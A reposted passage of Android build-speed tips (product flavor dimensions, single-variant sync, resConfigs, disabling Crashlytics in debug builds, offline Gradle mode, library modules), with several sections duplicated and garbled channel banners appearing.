3) If your build configuration already uses product flavors to create different versions of your app, you can combine the "dev" and "prod" configurations with those flavors by using flavor dimensions. For example, if you already configure a "demo" and "full" flavor, you can use the following sample configuration to create combined flavors, such as "devDemo" and "prodFull":
android {
...
defaultConfig {...}
buildTypes {...}
// Specifies the flavor dimensions you want to use. The order in which you
// list each dimension determines its priority, from highest to lowest,
// when Gradle merges variant sources and configurations. You must assign
// each product flavor you configure to one of the flavor dimensions.
flavorDimensions "stage", "mode"
productFlavors {
dev {
dimension "stage"
minSdkVersion 21
versionNameSuffix "-dev"
applicationIdSuffix '.dev'
...
}
prod {
dimension "stage"
...
}
demo {
dimension "mode"
...
}
full {
dimension "mode"
...
}
}
}
4) Enable single-variant project sync
> Syncing your project with your build configuration is an important step in letting Android Studio understand how your project is structured. However, this process can be time-consuming for large projects. If your project uses multiple build variants, you can now optimize project syncs by limiting them to only the variant you have currently selected.
5) You need to use Android Studio 3.3 or higher with Android Gradle Plugin 3.3.0 or higher to enable this optimization. The optimization is enabled by default on all projects.
6) To enable this optimization manually, click File > Settings > Experimental > Gradle (Android Studio > Preferences > Experimental > Gradle on a Mac) and select the Only sync the active variant checkbox.
> Syncing your project with your build configuration is an important step in letting Android Studio understand how your project is structured. However, this process can be time-consuming for large projects. If your project uses multiple build variants, you can now optimize project syncs by limiting them to only the variant you have currently selected.
5) You need to use Android Studio 3.3 or higher with Android Gradle Plugin 3.3.0 or higher to enable this optimization. The optimization is enabled by default on all projects.
6) To enable this optimization manually, click File > Settings > Experimental > Gradle (Android Studio > Preferences > Experimental > Gradle on a Mac) and select the Only sync the active variant checkbox.
7) Avoid compiling unnecessary resources
Avoid compiling and packaging resources that you aren't testing (such as additional language localizations and screen-density resources). You can do that by only specifying one language resource and screen density for your "dev" flavor, as shown in the following sample:
android {
...
productFlavors {
dev {
...
// The following configuration limits the "dev" flavor to using
// English stringresources and xxhdpi screen-density resources.
resConfigs "en", "xxhdpi"
}
...
}
}
8) Disable Crashlytics for your debug builds
If you don't need to run a Crashlytics report, speed up your debug builds by disabling the plugin as follows:
android {
...
buildTypes {
debug {
ext.enableCrashlytics = false
}
}
You also need to disable the Crashlytics kit at runtime for debug builds by changing the way you initialize support for Fabric in your app, as shown below:
KOTLIN
JAVA
// Initializes Fabric for builds that don't use the debug build type.
Crashlytics.Builder()
.core(CrashlyticsCore.Builder().disabled(BuildConfig.DEBUG).build())
.build()
.also { crashlyticsKit ->
Fabric.with(this, crashlyticsKit)
}
Avoid compiling and packaging resources that you aren't testing (such as additional language localizations and screen-density resources). You can do that by only specifying one language resource and screen density for your "dev" flavor, as shown in the following sample:
android {
...
productFlavors {
dev {
...
// The following configuration limits the "dev" flavor to using
// English stringresources and xxhdpi screen-density resources.
resConfigs "en", "xxhdpi"
}
...
}
}
8) Disable Crashlytics for your debug builds
If you don't need to run a Crashlytics report, speed up your debug builds by disabling the plugin as follows:
android {
...
buildTypes {
debug {
ext.enableCrashlytics = false
}
}
You also need to disable the Crashlytics kit at runtime for debug builds by changing the way you initialize support for Fabric in your app, as shown below:
KOTLIN
JAVA
// Initializes Fabric for builds that don't use the debug build type.
Crashlytics.Builder()
.core(CrashlyticsCore.Builder().disabled(BuildConfig.DEBUG).build())
.build()
.also { crashlyticsKit ->
Fabric.with(this, crashlyticsKit)
}
9) Disable automatic build ID generation
If you want to use Crashlytics with your debug builds, you can still speed up incremental builds by preventing Crashlytics from updating app resources with its own unique build ID during every build. Because this build ID is stored in a resource file that is referenced by the manifest, disabling automatic build ID generation also allows you to use Apply Changes alongside Crashlytics for your debug builds.
To prevent Crashlytics from automatically updating its build ID, add the following to your build.gradle file:
android {
...
buildTypes {
debug {
ext.alwaysUpdateBuildId = false
}
}
10) Enable offline mode
If you are on a slow network connection, your build times may suffer when Gradle attempts to use network resources to resolve dependencies. You can tell Gradle to avoid using network resources by using only the artifacts that it has cached locally.
To use Gradle offline when building with Android Studio, proceed as follows:
Open the Preferences window by clicking File > Settings (on Mac, Android Studio > Preferences).
In the left pane, click Build, Execution, Deployment > Gradle.
Check the Offline work checkbox.
Click Apply or OK.
If you're building from the command line, pass the --offline option.
11) Create library modules
Look for code in your app that you can convert into an Android library module. Modularizing your code this way allows the build system to compile only the modules you modify and cache those outputs for future builds. It also makes parallel project execution more effective (when you enable that optimization).
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
If you want to use Crashlytics with your debug builds, you can still speed up incremental builds by preventing Crashlytics from updating app resources with its own unique build ID during every build. Because this build ID is stored in a resource file that is referenced by the manifest, disabling automatic build ID generation also allows you to use Apply Changes alongside Crashlytics for your debug builds.
To prevent Crashlytics from automatically updating its build ID, add the following to your build.gradle file:
android {
...
buildTypes {
debug {
ext.alwaysUpdateBuildId = false
}
}
10) Enable offline mode
If you are on a slow network connection, your build times may suffer when Gradle attempts to use network resources to resolve dependencies. You can tell Gradle to avoid using network resources by using only the artifacts that it has cached locally.
To use Gradle offline when building with Android Studio, proceed as follows:
Open the Preferences window by clicking File > Settings (on Mac, Android Studio > Preferences).
In the left pane, click Build, Execution, Deployment > Gradle.
Check the Offline work checkbox.
Click Apply or OK.
If you're building from the command line, pass the --offline option.
11) Create library modules
Look for code in your app that you can convert into an Android library module. Modularizing your code this way allows the build system to compile only the modules you modify and cache those outputs for future builds. It also makes parallel project execution more effective (when you enable that optimization).
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β